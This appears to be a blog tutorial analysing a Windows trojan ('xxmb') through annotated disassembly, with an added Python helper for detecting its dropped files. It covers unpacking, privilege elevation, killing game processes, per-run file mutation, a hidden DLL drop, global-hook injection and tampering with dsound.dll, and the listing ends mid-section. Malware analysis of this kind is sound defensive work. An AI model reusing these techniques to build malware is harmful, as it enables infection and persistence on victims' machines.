

Virus Assembly Reverse-Engineering Analysis: A Worked Example

Published: 2025/3/15   Programming Q&A   27   豆豆
This article was collected and organized by 生活随笔; it presents a worked example of reverse-engineering a virus at the assembly level and is shared here for reference.

Virus name:               xxmb
Packer info:              yoda's Protector v1.02 (.dll,.ocx) -> Ashkbiz Danehkar (h)
Affected system:          Windows
Related vulnerabilities:  none


File system changes

The following files are created:
C:\DOCUME~1\jack\LOCALS~1\Temp\kb712959.sve            (the digits after kb are randomly generated)
C:\Program Files\Common Files\System\kb712959.dla       (copied from kb712959.sve)
C:\WINDOWS\system32\dsound.dll
C:\WINDOWS\system32\dsound.dll.YUCH
C:\WINDOWS\system32\DllCache\dsound.dll
C:\WINDOWS\system32\DllCache\dsound.dll.YUCH

Detailed analysis / functionality

1. Elevate the current process's privileges and check whether the two processes "CSOLauncher.exe" and "cstrike-online.exe" exist

First, check the packer with PEiD: the entry point RVA is 1000, in the .text section.
But PEiD reports the packer yoda's Protector v1.02 (.dll,.ocx) -> Ashkbiz Danehkar. Looking more closely, the entry point was indeed changed after packing.

00401000 >/$  B8 D507D0B0   mov eax,0xB0D007D5
00401005  |   B8 6FA04000   mov eax,server.0040A06F
0040100A  |   8BC0          mov eax,eax
0040100C  |   8BD2          mov edx,edx                              ;  ntdll.KiFastSystemCallRet
0040100E  |   55            push ebp
0040100F  |   8BE9          mov ebp,ecx
00401011  |.  5D            pop ebp
00401012  |   50            push eax
00401013  |   51            push ecx
00401014  |   8BC8          mov ecx,eax
00401016  |.  59            pop ecx
00401017  |.  C3            retn                                     ;  pushes 0040A06F and uses retn to return to 40A06F, where the packer stub executes

So now we can change the OEP to A06F and then see whether it can be unpacked.
The packer stub is visible; it can be unpacked with the ESP trick.
0040A06F >  60              pushad
0040A070    83EC 38         sub esp,0x38
0040A073    33C0            xor eax,eax
0040A075    C745 D8 4765745>mov dword ptr ss:[ebp-0x28],0x50746547
0040A07C    C745 DC 726F634>mov dword ptr ss:[ebp-0x24],0x41636F72
0040A083    C745 E0 6464726>mov dword ptr ss:[ebp-0x20],0x65726464
0040A08A    C745 E4 7373000>mov dword ptr ss:[ebp-0x1C],0x7373

After unpacking, PEiD shows it was written in Microsoft Visual C++ 6.0.

004048B4 >/$  55            push ebp
004048B5  |.  8BEC          mov ebp,esp
004048B7  |.  6A FF         push -0x1
004048B9  |.  68 E8504000   push Cracker.004050E8
004048BE  |.  68 20484000   push <jmp.&MSVCRT._except_handler3>      ;  SE handler installation
004048C3  |.  64:A1 0000000>mov eax,dword ptr fs:[0]
004048C9  |.  50            push eax

Now to the main part:

Single-step to
0040382F  call 00402B29 and step into it

00402BF8  |.  C645 E9 65    mov byte ptr ss:[ebp-0x17],0x65
00402BFC  |.  C645 EA 67    mov byte ptr ss:[ebp-0x16],0x67
00402C00  |.  C645 EB 65    mov byte ptr ss:[ebp-0x15],0x65          ;  SeDebugPrivilege, cstrike-online.exe, CSOLauncher
00402C04  |.  E8 26E8FFFF   call Cracker.0040142F                    ;  elevate this process's privileges
00402C09  |.  8D45 F0       lea eax,[local.4]
00402C0C  |.  50            push eax                                 ;  CSOLauncher.exe
00402C0D  |.  E8 73E6FFFF   call Cracker.00401285
00402C12  |.  8D45 C8       lea eax,[local.14]
00402C15  |.  50            push eax                                 ;  "cstrike-online.exe"
00402C16  |.  E8 6AE6FFFF   call Cracker.00401285

Step into 40142F:

0040146F  |.  C645 FA 6C    mov byte ptr ss:[ebp-0x6],0x6C           ; |
00401473  |.  C645 FB 6C    mov byte ptr ss:[ebp-0x5],0x6C           ; |Advapi.dll
00401477  |.  885D FC       mov byte ptr ss:[ebp-0x4],bl             ; |
0040147A  |.  FFD6          call esi                                 ; \LoadLibraryA

00401558  |.  C645 A8 6C    mov byte ptr ss:[ebp-0x58],0x6C
0040155C  |.  C645 A9 65    mov byte ptr ss:[ebp-0x57],0x65
00401560  |.  C645 AA 67    mov byte ptr ss:[ebp-0x56],0x67
00401564  |.  C645 AB 65    mov byte ptr ss:[ebp-0x55],0x65
00401568  |.  8D45 DC       lea eax,[local.9]
0040156B  |.  C645 AC 73    mov byte ptr ss:[ebp-0x54],0x73          ;  OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges
0040156F  |.  50            push eax                                 ;  "FuncName"
00401570  |.  57            push edi                                 ;  hModuleDll
00401571  |.  885D AD       mov byte ptr ss:[ebp-0x53],bl
00401574  |.  E8 A7030000   call Cracker.00401920
You can step into 401920 and see that it uses the module handle and function name to look up the address in the export table.

Then it obtains the two functions CloseHandle and GetCurrentProcess from kernel32.dll, and the call chain is:
GetCurrentProcess---->OpenProcessToken----->LookupPrivilegeValueA---->AdjustTokenPrivileges---->CloseHandle

00401610  |.  FFD0          call eax                                 ;  GetCurrentProcess
00401612  |.  50            push eax
00401613  |.  FF55 88       call [local.30]                          ;  OpenProcessToken
00401616  |.  85C0          test eax,eax
00401618  |.  74 5C         je XCracker.00401676
0040161A  |.  8D85 7CFFFFFF lea eax,[local.33]
00401620  |.  50            push eax
00401621  |.  FF75 08       push [arg.1]
00401624  |.  53            push ebx
00401625  |.  FF55 8C       call [local.29]                          ;  LookupPrivilegeValueA
00401628  |.  85C0          test eax,eax

0040165F  |.  53            push ebx
00401660  |.  50            push eax
00401661  |.  53            push ebx
00401662  |.  89B5 6CFFFFFF mov [local.37],esi
00401668  |.  FF75 94       push [local.27]
0040166B  |.  FF55 84       call [local.31]                          ;  AdjustTokenPrivileges

Step into call Cracker.00401285:
It calls LoadLibraryA to load kernel32.dll, then obtains CreateToolhelp32Snapshot, Process32First and Process32Next, and then searches for the CSOLauncher.exe and cstrike-online.exe processes; if either is found, it terminates that process.
The corresponding code:

004013C7  |.  FFD3          call ebx                                 ;  CreateToolhelp32Snapshot
004013C9  |.  8BD8          mov ebx,eax
004013CB  |.  EB 03         jmp XCracker.004013D0
004013CD  |>  8B5D 08       mov ebx,[arg.1]
004013D0  |>  83FB FF       cmp ebx,-0x1
004013D3  |.  75 04         jnz XCracker.004013D9
004013D5  |.  33C0          xor eax,eax
004013D7  |.  EB 51         jmp XCracker.0040142A
004013D9  |>  8D85 94FEFFFF lea eax,[local.91]
004013DF  |.  C785 94FEFFFF>mov [local.91],0x128
004013E9  |.  50            push eax
004013EA  |.  53            push ebx
004013EB  |.  FF55 BC       call [local.17]                          ;  Process32First
004013EE  |.  85C0          test eax,eax
004013F0  |.  74 33         je XCracker.00401425
004013F2  |>  8D85 B8FEFFFF /lea eax,[local.82]
004013F8  |.  50            |push eax
004013F9  |.  FF75 08       |push [arg.1]                            ;  process name
004013FC  |.  E8 CA020000   |call Cracker.004016CB                   ;  equivalent to strcmp
00401401  |.  59            |pop ecx
00401402  |.  85C0          |test eax,eax
00401404  |.  59            |pop ecx
00401405  |.  75 0C         |jnz XCracker.00401413
00401407  |.  FFB5 9CFEFFFF |push [local.89]                         ;  process PID
0040140D  |.  E8 8DFDFFFF   |call Cracker.0040119F                   ;  OpenProcess, TerminateProcess
00401412  |.  59            |pop ecx                                 ;  ntdll.7C92F641
00401413  |>  8D85 94FEFFFF |lea eax,[local.91]
00401419  |.  50            |push eax
0040141A  |.  53            |push ebx
0040141B  |.  FF55 C0       |call [local.16]                         ;  Process32Next
0040141E  |.  85C0          |test eax,eax
00401420  |.^ 75 D0         \jnz XCracker.004013F2

2. Write the resource to the temporary file C:\DOCUME~1\jack\LOCALS~1\Temp\kb******.sve (****** is a string of random digits), copy the mutated temporary file to C:\Program Files\Common Files\System\kb******.dla, and set the file's attributes to hidden

00403840  |.  8BF8          mov edi,eax
00403842  |.  56            push esi                                 ; /n
00403843  |.  6A 00         push 0x0                                 ; |c = 00
00403845  |.  57            push edi                                 ; |s
00403846  |.  E8 E70F0000   call <jmp.&MSVCRT.memset>                ; \memset
0040384B  |.  6A 00         push 0x0
0040384D  |.  57            push edi
0040384E  |.  6A 06         push 0x6
00403850  |.  E8 F7F3FFFF   call Cracker.00402C4C
Step into the key call 402C4C:

00402D35  |.  C645 88 53    mov byte ptr ss:[ebp-0x78],0x53          ;  copyfile
00402D39  |.  AA            stos byte ptr es:[edi]
00402D3A  |.  C645 89 4F    mov byte ptr ss:[ebp-0x77],0x4F
00402D3E  |.  C645 8A 46    mov byte ptr ss:[ebp-0x76],0x46
00402D42  |.  C645 8B 54    mov byte ptr ss:[ebp-0x75],0x54
00402D46  |.  C645 8C 57    mov byte ptr ss:[ebp-0x74],0x57
00402D4A  |.  C645 8D 41    mov byte ptr ss:[ebp-0x73],0x41
00402D4E  |.  C645 8E 52    mov byte ptr ss:[ebp-0x72],0x52
00402D52  |.  C645 8F 45    mov byte ptr ss:[ebp-0x71],0x45
00402D56  |.  C645 90 5C    mov byte ptr ss:[ebp-0x70],0x5C
00402D5A  |.  C645 91 41    mov byte ptr ss:[ebp-0x6F],0x41
00402D5E  |.  8B7D 0C       mov edi,[arg.2]                          ;  heap base address
00402D61  |.  8065 9F 00    and byte ptr ss:[ebp-0x61],0x0
00402D65  |.  8065 CE 00    and byte ptr ss:[ebp-0x32],0x0
00402D69  |.  8065 CF 00    and byte ptr ss:[ebp-0x31],0x0
00402D6D  |.  8065 BD 00    and byte ptr ss:[ebp-0x43],0x0
00402D71  |.  8D45 B8       lea eax,[local.18]
00402D74  |.  6A 76         push 0x76
00402D76  |.  50            push eax
00402D77  |.  57            push edi
00402D78  |.  C645 92 68    mov byte ptr ss:[ebp-0x6E],0x68
00402D7C  |.  C645 93 6E    mov byte ptr ss:[ebp-0x6D],0x6E
00402D80  |.  C645 94 4C    mov byte ptr ss:[ebp-0x6C],0x4C
00402D84  |.  C645 95 61    mov byte ptr ss:[ebp-0x6B],0x61
00402D88  |.  C645 96 62    mov byte ptr ss:[ebp-0x6A],0x62
00402D8C  |.  C645 97 5C    mov byte ptr ss:[ebp-0x69],0x5C
00402D90  |.  C645 98 48    mov byte ptr ss:[ebp-0x68],0x48
00402D94  |.  C645 99 53    mov byte ptr ss:[ebp-0x67],0x53
00402D98  |.  C645 9A 68    mov byte ptr ss:[ebp-0x66],0x68
00402D9C  |.  C645 9B 69    mov byte ptr ss:[ebp-0x65],0x69
00402DA0  |.  C645 9C 65    mov byte ptr ss:[ebp-0x64],0x65
00402DA4  |.  C645 9D 6C    mov byte ptr ss:[ebp-0x63],0x6C
00402DA8  |.  C645 9E 64    mov byte ptr ss:[ebp-0x62],0x64          ;  SOFTWARE\AhnLab\HShield
00402DAC  |.  C645 B8 6D    mov byte ptr ss:[ebp-0x48],0x6D
00402DB0  |.  C645 B9 73    mov byte ptr ss:[ebp-0x47],0x73
00402DB4  |.  C645 BA 63    mov byte ptr ss:[ebp-0x46],0x63
00402DB8  |.  C645 BB 72    mov byte ptr ss:[ebp-0x45],0x72
00402DBC  |.  C645 BC 6F    mov byte ptr ss:[ebp-0x44],0x6F          ;  mscro
00402DC0  |.  E8 C9F7FFFF   call Cracker.0040258E


This call writes the resource to the temporary file C:\DOCUME~1\jack\LOCALS~1\Temp\kb******.sve (****** is a string of random digits).

First:
004025FE  |.  885D C8       mov byte ptr ss:[ebp-0x38],bl            ;  GetTempPathA
00402601  |.  E8 1AF3FFFF   call Cracker.00401920
00402606  |.  59            pop ecx
00402607  |.  59            pop ecx
00402608  |.  8D8D 60FEFFFF lea ecx,[local.104]
0040260E  |.  51            push ecx                                 ;  buffer that receives the temp file path
0040260F  |.  68 04010000   push 0x104
00402614  |.  FFD0          call eax                                 ;  GetTempPathA  (temp file creation)
00402616  |.  85C0          test eax,eax

Then, in the same way, it obtains FindResource--->LoadResource--->SizeofResource->LockResource->FreeResource.

Next it uses time() to produce a seed and randomly generates a 6-character string to form kb******.sve:

00402789  |.  FF15 98504000 call dword ptr ds:[<&MSVCRT.time>]       ; \time
0040278F  |.  50            push eax                                 ; /seed
00402790  |.  FF15 94504000 call dword ptr ds:[<&MSVCRT.srand>]      ; \srand
00402796  |.  83C4 30       add esp,0x30
00402799  |.  6A 02         push 0x2
0040279B  |.  5F            pop edi
0040279C  |>  FF15 90504000 /call dword ptr ds:[<&MSVCRT.rand>]      ; [rand
004027A2  |.  6A 0A         |push 0xA
004027A4  |.  99            |cdq
004027A5  |.  59            |pop ecx
004027A6  |.  F7F9          |idiv ecx
004027A8  |.  80C2 30       |add dl,0x30
004027AB  |.  88943D 64FFFF>|mov byte ptr ss:[ebp+edi-0x9C],dl
004027B2  |.  47            |inc edi
004027B3  |.  83FF 08       |cmp edi,0x8                             ;  while(edi < 0x8)
004027B6  |.^ 7C E4         \jl XCracker.0040279C
004027B8  |.  C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x2E
004027C0  |.  47            inc edi
004027C1  |.  8D85 64FFFFFF lea eax,[local.39]
004027C7  |.  C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x73
004027CF  |.  47            inc edi
004027D0  |.  50            push eax
004027D1  |.  8D85 60FEFFFF lea eax,[local.104]
004027D7  |.  C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x76

004027E0  |.  50            push eax                                 ;  temp file path
004027E1  |.  C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x65
004027E9  |.  889C3D 65FFFF>mov byte ptr ss:[ebp+edi-0x9B],bl
004027F0  |.  E8 A5EFFFFF   call Cracker.0040179A                    ;  strcat
004027F5  |.  8D85 60FEFFFF lea eax,[local.104]
004027FB  |.  50            push eax                                 ;  C:\DOCUME~1\jack\LOCALS~1\Temp\kb420995.sve
004027FC  |.  FF75 08       push [arg.1]                             ;  heap base address
004027FF  |.  E8 9FEEFFFF   call Cracker.004016A3                    ;  copy the generated path into the heap
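The name-generation loop above, reproduced as an added Python example (not the dropper's code): it mirrors the srand/rand loop and the later strncpy/strcat that turns the .sve name into the .dla name, and derives from them a file-name pattern a defender can use to hunt for the dropped artefacts. Python's random module stands in for MSVCRT rand(), so the digits differ but the shape of the name is the same; the sample paths are constructed.

```python
import random
import re
import time

# Hypothetical re-implementation of the loop at 00402789-004027F0:
# srand(time(NULL)); for (edi = 2; edi < 8; edi++) buf[edi] = rand() % 10 + '0';
# then ".sve" and a terminating NUL. random.Random stands in for MSVCRT rand().
PREFIX = "kb"


def make_temp_name(rng=None):
    """Return a file name shaped like the dropper's kb######.sve."""
    if rng is None:
        rng = random.Random(int(time.time()))    # srand(time(NULL)) stand-in
    buf = list(PREFIX)                           # bytes 0-1 already hold "kb"
    for _ in range(2, 8):                        # edi starts at 2, loops while edi < 8
        buf.append(chr(rng.randrange(10) + 0x30))  # rand() % 10, then add dl,0x30
    buf.append(".")                              # 0x2E
    buf.extend("sve")                            # 0x73 0x76 0x65, followed by NUL
    return "".join(buf)


def sve_to_dla(sve_name):
    """Mirror strncpy(dst, src, strlen(src) - 3) followed by strcat(dst, "dla")."""
    return sve_name[:len(sve_name) - 3] + "dla"


# Hunting pattern derived from the two dropped artefacts in the write-up:
# %TEMP%\kb######.sve and ...\Common Files\System\kb######.dla.
DROPPED_NAME = re.compile(r"^kb\d{6}\.(?:sve|dla)$", re.IGNORECASE)


def is_dropped_name(path):
    """True when the last path component matches the dropper's naming scheme."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    return DROPPED_NAME.match(name) is not None


if __name__ == "__main__":
    generated = make_temp_name()
    print(generated, "->", sve_to_dla(generated), is_dropped_name(generated))
```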

0040280A  |.  53            push ebx                                 ; /pModule
0040280B  |.  FF15 04504000 call dword ptr ds:[<&kernel32.GetModuleH>; \GetModuleHandleA
00402811  |.  FF75 0C       push [arg.2]                             ;  mscro (a custom resource type)
00402814  |.  8BF8          mov edi,eax
00402816  |.  FF75 10       push [arg.3]                             ;  resource ID = 76
00402819  |.  57            push edi
0040281A  |.  FF55 84       call [local.31]                          ;  FindResourceA  locate the specified resource
0040281D  |.  8945 08       mov [arg.1],eax                          ;  HRSRC
00402820  |.  50            push eax
00402821  |.  58            pop eax
00402822  |.  395D 08       cmp [arg.1],ebx
00402825  |.  0F84 9B000000 je Cracker.004028C6
0040282B  |.  FF75 08       push [arg.1]                             ;  HRSRC
0040282E  |.  57            push edi                                 ;  hModule
0040282F  |.  FF55 88       call [local.30]                          ;  LoadResource  load the specified resource into memory
00402832  |.  3BC3          cmp eax,ebx                              ;  407070 is the memory pointer to the resource data

0040284F  |.  57            push edi
00402850  |.  FF55 98       call [local.26]                          ;  SizeofResource  get the resource size
00402853  |.  BF 10604000   mov edi,Cracker.00406010                 ;  ASCII "Kernel32.dll"
00402858  |.  68 44604000   push Cracker.00406044                    ;  ASCII "CreateFileA"
0040285D  |.  57            push edi
0040285E  |.  8945 98       mov [local.26],eax                       ;  [local.26] = 2800  resource size
00402861  |.  FFD6          call esi
00402863  |.  50            push eax
00402864  |.  E8 B7F0FFFF   call Cracker.00401920
00402869  |.  59            pop ecx
0040286A  |.  8945 08       mov [arg.1],eax                          ;  CreateFile
0040286D  |.  59            pop ecx
0040286E  |.  68 50604000   push Cracker.00406050                    ;  ASCII "CloseHandle"
00402873  |.  57            push edi
00402874  |.  FFD6          call esi
00402876  |.  50            push eax
00402877  |.  E8 A4F0FFFF   call Cracker.00401920
0040287C  |.  59            pop ecx
0040287D  |.  8945 0C       mov [arg.2],eax
00402880  |.  59            pop ecx
00402881  |.  8D85 60FEFFFF lea eax,[local.104]
00402887  |.  53            push ebx
00402888  |.  53            push ebx
00402889  |.  6A 02         push 0x2
0040288B  |.  53            push ebx
0040288C  |.  53            push ebx
0040288D  |.  68 000000C0   push 0xC0000000
00402892  |.  50            push eax                                 ;  C:\DOCUME~1\jack\LOCALS~1\Temp\kb420995.sve
00402893  |.  FF55 08       call [arg.1]                             ;  CreateFile
00402896  |.  8BF0          mov esi,eax
00402898  |.  83FE FF       cmp esi,-0x1
0040289B  |.  0F84 A4000000 je Cracker.00402945
004028A1  |.  8D45 FC       lea eax,[local.1]
004028A4  |.  53            push ebx                                 ; /pOverlapped
004028A5  |.  50            push eax                                 ; |pBytesWritten
004028A6  |.  8B3D 1C504000 mov edi,dword ptr ds:[<&kernel32.WriteFi>; |kernel32.WriteFile
004028AC  |.  FF75 98       push [local.26]                          ; |SizeofResource return value = 0x2800
004028AF  |.  FF75 94       push [local.27]                          ; |Buffer = 407070  pointer to the resource
004028B2  |.  56            push esi                                 ; |hFile  temp file handle
004028B3  |.  FFD7          call edi                                 ; \WriteFile

00402DCD  |.  E8 85FBFFFF   call Cracker.00402957                    ;  opens the parent file and reads its last two dwords, appends random data to the end of the temp file, then writes the dwords read from the parent into the temp file. The purpose is to mutate the file so that it differs on every run. You can step in and see for yourself

Next come the registry operations:
00402E36  |.  C645 A7 2E    mov byte ptr ss:[ebp-0x59],0x2E
00402E3A  |.  C645 A8 62    mov byte ptr ss:[ebp-0x58],0x62
00402E3E  |.  C645 A9 65    mov byte ptr ss:[ebp-0x57],0x65
00402E42  |.  C645 AA 74    mov byte ptr ss:[ebp-0x56],0x74          ;  SOFTWARE\AhnLab\HShield.dbghelp.bet
00402E46  |.  E8 57F0FFFF   call Cracker.00401EA2
Step into call 401EA2:

00401EB3  |.  FF75 08       push [arg.1]
00401EB6  |.  E8 06FCFFFF   call Cracker.00401AC1                    ;  RegOpenKeyExA opens the subkey SOFTWARE\AhnLab\HShield; this open fails, you can step in and see for yourself

00401F84  |.  C645 D1 68    mov byte ptr ss:[ebp-0x2F],0x68          ; |
00401F88  |.  C645 D2 65    mov byte ptr ss:[ebp-0x2E],0x65          ; |Software\Microsoft\windows\ShellNoRoam\MUICache
00401F8C  |.  885D D3       mov byte ptr ss:[ebp-0x2D],bl            ; |
00401F8F  |.  C645 E4 41    mov byte ptr ss:[ebp-0x1C],0x41          ; |
00401F93  |.  C645 E5 64    mov byte ptr ss:[ebp-0x1B],0x64          ; |
00401F97  |.  C645 E6 76    mov byte ptr ss:[ebp-0x1A],0x76          ; |
00401F9B  |.  C645 E7 61    mov byte ptr ss:[ebp-0x19],0x61          ; |
00401F9F  |.  C645 E8 70    mov byte ptr ss:[ebp-0x18],0x70          ; |
00401FA3  |.  C645 E9 69    mov byte ptr ss:[ebp-0x17],0x69          ; |
00401FA7  |.  C645 EA 33    mov byte ptr ss:[ebp-0x16],0x33          ; |
00401FAB  |.  C645 EB 32    mov byte ptr ss:[ebp-0x15],0x32          ; |
00401FAF  |.  C645 EC 2E    mov byte ptr ss:[ebp-0x14],0x2E          ; |
00401FB3  |.  C645 ED 64    mov byte ptr ss:[ebp-0x13],0x64          ; |
00401FB7  |.  C645 EE 6C    mov byte ptr ss:[ebp-0x12],0x6C          ; |
00401FBB  |.  C645 EF 6C    mov byte ptr ss:[ebp-0x11],0x6C          ; |Advapi32.dll
00401FBF  |.  885D F0       mov byte ptr ss:[ebp-0x10],bl            ; |
00401FC2  |.  FF15 00504000 call dword ptr ds:[<&kernel32.LoadLibraryA>]  ; \LoadLibraryA
00401FC8  |.  8BF0          mov esi,eax
00401FCA  |.  3BF3          cmp esi,ebx
00401FCC  |.  0F84 BB000000 je Cracker.0040208D
00401FD2  |.  8D45 D4       lea eax,[local.11]
00401FD5  |.  57            push edi                                 ;  temp file

0040203B  |.  885D FF       mov byte ptr ss:[ebp-0x1],bl
0040203E  |.  E8 DDF8FFFF   call Cracker.00401920
00402043  |.  8BF8          mov edi,eax                              ;  edi = RegOpenKeyExA
00402045  |.  8D45 F4       lea eax,[local.3]
00402048  |.  50            push eax
00402049  |.  56            push esi
0040204A  |.  E8 D1F8FFFF   call Cracker.00401920
0040204F  |.  83C4 10       add esp,0x10
00402052  |.  8BF0          mov esi,eax                              ;  esi = RegCloseKey
00402054  |.  8D45 14       lea eax,[arg.4]
00402057  |.  50            push eax
00402058  |.  68 19000200   push 0x20019
0040205D  |.  8D45 A4       lea eax,[local.23]
00402060  |.  53            push ebx
00402061  |.  50            push eax                                 ;  Software\Microsoft\windows\ShellNoRoam\MUICache
00402062  |.  68 01000080   push 0x80000001                          ;  HKEY_CURRENT_USER
00402067  |.  FFD7          call edi                                 ;  RegOpenKeyExA
00402069  |.  85C0          test eax,eax                             ;  if(iRet==ERROR_SUCCESS)
0040206B  |.  5F            pop edi
0040206C  |.  75 11         jnz XCracker.0040207F
0040206E  |.  FF75 18       push [arg.5]                             ;  subkey opened successfully
00402071  |.  FF75 14       push [arg.4]
00402074  |.  FF75 08       push [arg.1]
00402077  |.  E8 4CFCFFFF   call Cracker.00401CC8
Hmm, the registry is not actually modified here... let's continue.

Next it copies the mutated temporary file to C:\Program Files\Common Files\System\kb******.dla and sets the file's attributes to hidden:

0040318B  |.  C645 D5 65    mov byte ptr ss:[ebp-0x2B],0x65
0040318F  |.  C645 D6 6D    mov byte ptr ss:[ebp-0x2A],0x6D          ;  \System
00403193  |.  E8 E3E4FFFF   call Cracker.0040167B
00403198  |.  8BF8          mov edi,eax
0040319A  |.  47            inc edi
0040319B  |.  57            push edi                                 ;  kb******.sve
0040319C  |.  E8 E3E5FFFF   call Cracker.00401784                    ;  strlen
004031A1  |.  83E8 03       sub eax,0x3
004031A4  |.  50            push eax                                 ; /maxlen
004031A5  |.  8D85 4CFFFFFF lea eax,[local.45]                       ; |copies kb******.
004031AB  |.  57            push edi                                 ; |src
004031AC  |.  50            push eax                                 ; |dest
004031AD  |.  FF15 9C504000 call dword ptr ds:[<&MSVCRT.strncpy>]    ; \strncpy
004031B3  |.  8D85 4CFFFFFF lea eax,[local.45]
004031B9  |.  68 7C604000   push Cracker.0040607C                    ;  ASCII "dla"
004031BE  |.  50            push eax                                 ;  kb******.
004031BF  |.  E8 D6E5FFFF   call Cracker.0040179A                    ;  strcat
004031C4  |.  8D85 4CFFFFFF lea eax,[local.45]
004031CA  |.  50            push eax                                 ;  kb******.dla
004031CB  |.  8D85 B8F9FFFF lea eax,[local.402]
004031D1  |.  50            push eax
004031D2  |.  E8 CCE4FFFF   call Cracker.004016A3                    ;  memcpy(12F8B0, "kb******.dla")
00403261  |.  8D85 B8F9FFFF lea eax,[local.402]
00403267  |.  50            push eax                                 ;  kb******.dla
00403268  |.  8D85 48FEFFFF lea eax,[local.110]
0040326E  |.  50            push eax
0040326F  |.  E8 26E5FFFF   call Cracker.0040179A                    ;  strcat
00403274  |.  83C4 18       add esp,0x18
00403277  |>  8D85 48FEFFFF lea eax,[local.110]                      ;  C:\Program Files\Common Files\System\kb******.dla
0040327D  |.  50            push eax
0040327E  |.  E8 01E5FFFF   call Cracker.00401784                    ;  strlen
00403283  |.  85C0          test eax,eax
00403285  |.  59            pop ecx
00403286  |.  0F84 35010000 je Cracker.004033C1
0040328C  |.  8D85 48FEFFFF lea eax,[local.110]
00403292  |.  68 80000000   push 0x80                                ; /FileAttributes = NORMAL
00403297  |.  50            push eax                                 ; |FileName
00403298  |.  FF15 24504000 call dword ptr ds:[<&kernel32.SetFileAttributes>; \SetFileAttributesA
0040329E  |.  8D85 48FEFFFF lea eax,[local.110]
004032A4  |.  6A 00         push 0x0
004032A6  |.  50            push eax                                 ;  C:\Program Files\Common Files\System\kb******.dla
004032A7  |.  FF75 0C       push [arg.2]                             ;  temp file path
004032AA  |.  FF55 C4       call [local.15]                          ;  copyfile

0040336C  |.  8BD8          mov ebx,eax                              ;  ebx = SetFileAttributes
0040336E  |.  59            pop ecx
0040336F  |.  8D85 48FEFFFF lea eax,[local.110]
00403375  |.  50            push eax                                 ;  C:\Program Files\Common Files\System\kb******.dla
00403376  |.  FFD7          call edi                                 ;  edi = GetFileAttributesA
00403378  |.  0C 02         or al,0x2                                ;  OR in FILE_ATTRIBUTE_HIDDEN
0040337A  |.  50            push eax
0040337B  |.  8D85 48FEFFFF lea eax,[local.110]
00403381  |.  50            push eax
00403382  |.  FFD3          call ebx                                 ;  SetFileAttributes  hide the file


3. Load the temporary file, get its exported function LoadDll, then call LoadDll to install a global hook (hook type WH_GETMESSAGE)

0040339F  |.  C645 C5 6C    mov byte ptr ss:[ebp-0x3B],0x6C
004033A3  |.  C645 C6 6C    mov byte ptr ss:[ebp-0x3A],0x6C          ;  LoadDll
004033A7  |.  FFD6          call esi                                 ;  LoadLibrary (load the temp file)
004033A9  |.  8D4D C0       lea ecx,[local.16]
004033AC  |.  51            push ecx                                 ;  LoadDll
004033AD  |.  50            push eax                                 ;  hModule
004033AE  |.  E8 6DE5FFFF   call Cracker.00401920
004033B3  |.  59            pop ecx
004033B4  |.  59            pop ecx
004033B5  |.  85C0          test eax,eax
004033B7  |.  74 08         je XCracker.004033C1
004033B9  |.  FFD0          call eax                                 ;  LoadDll export

Step into call eax.
It installs a global hook of type WH_GETMESSAGE, and the callback does nothing at all, so the purpose of this export is simply to get this DLL loaded into any thread that calls GetMessage or PeekMessage... this DLL feels evil.

10002082    FF7424 0C       push dword ptr ss:[esp+0xC]
10002086    FF7424 0C       push dword ptr ss:[esp+0xC]
1000208A    FF7424 0C       push dword ptr ss:[esp+0xC]
1000208E    FF35 00600010   push dword ptr ds:[0x10006000]
10002094    FF15 DC400010   call dword ptr ds:[0x100040DC]           ; USER32.CallNextHookEx
1000209A    C2 0C00         retn 0xC
1000209D >  6A 00           push 0x0                                 ; 0 = global hook
1000209F    FF35 00530010   push dword ptr ds:[0x10005300]           ; kb372004.10000000
100020A5    68 82200010     push kb372004.10002082                   ; Hook_CallBack
100020AA    6A 03           push 0x3                                 ; WH_GETMESSAGE
100020AC    FF15 D8400010   call dword ptr ds:[0x100040D8]           ; USER32.SetWindowsHookExA
100020B2    A3 00600010     mov dword ptr ds:[0x10006000],eax
100020B7    C3              retn
100020B8 >  FF35 00600010   push dword ptr ds:[0x10006000]
100020BE    FF15 D4400010   call dword ptr ds:[0x100040D4]           ; USER32.UnhookWindowsHookEx
100020C4    C3              retn


4. Check whether the file C:\windows\system32\dsound.dll exists; if it does, make a copy of it named C:\windows\system32\dsound.dll.dat

00402411  |.  C645 D8 41    mov byte ptr ss:[ebp-0x28],0x41          ;  CopyFile
00402415  |.  885D D9       mov byte ptr ss:[ebp-0x27],bl
00402418  |.  E8 70F4FFFF   call Cracker.0040188D                    ;  this call invokes GetSystemDirectory
0040241D  |.  8D85 08FCFFFF lea eax,[local.254]
00402423  |.  50            push eax
00402424  |.  8D85 0CFDFFFF lea eax,[local.189]
0040242A  |.  50            push eax
0040242B  |.  E8 73F2FFFF   call Cracker.004016A3
00402430  |.  FF75 08       push [arg.1]                             ;  dsound.dll
00402433  |.  8D85 0CFDFFFF lea eax,[local.189]
00402439  |.  50            push eax
0040243A  |.  E8 5BF3FFFF   call Cracker.0040179A                    ;  strcat
0040243F  |.  8D85 0CFDFFFF lea eax,[local.189]                      ;  C:\windows\system32\dsound.dll
00402445  |.  50            push eax
00402446  |.  8D85 10FEFFFF lea eax,[local.124]                      ;  newbuf
0040244C  |.  50            push eax
0040244D  |.  E8 51F2FFFF   call Cracker.004016A3                    ;  memcpy
00402452  |.  8D45 E4       lea eax,[local.7]
00402455  |.  50            push eax                                 ;  .dat
00402456  |.  8D85 10FEFFFF lea eax,[local.124]
0040245C  |.  50            push eax
0040245D  |.  E8 38F3FFFF   call Cracker.0040179A                    ;  C:\windows\system32\dsound.dll.dat
00402462  |.  83C4 24       add esp,0x24
00402465  |.  8D45 D0       lea eax,[local.12]
00402468  |.  50            push eax                                 ;  CopyFile
00402469  |.  68 10604000   push Cracker.00406010                    ; /FileName = "Kernel32.dll"
0040246E  |.  FF15 00504000 call dword ptr ds:[<&kernel32.LoadLibraryA>]  ; \LoadLibraryA
00402474  |.  50            push eax
00402475  |.  E8 A6F4FFFF   call Cracker.00401920
0040247A  |.  8BF8          mov edi,eax                              ;  edi = CopyFile
0040247C  |.  8D85 0CFDFFFF lea eax,[local.189]
00402482  |.  50            push eax                                 ;  C:\windows\system32\dsound.dll
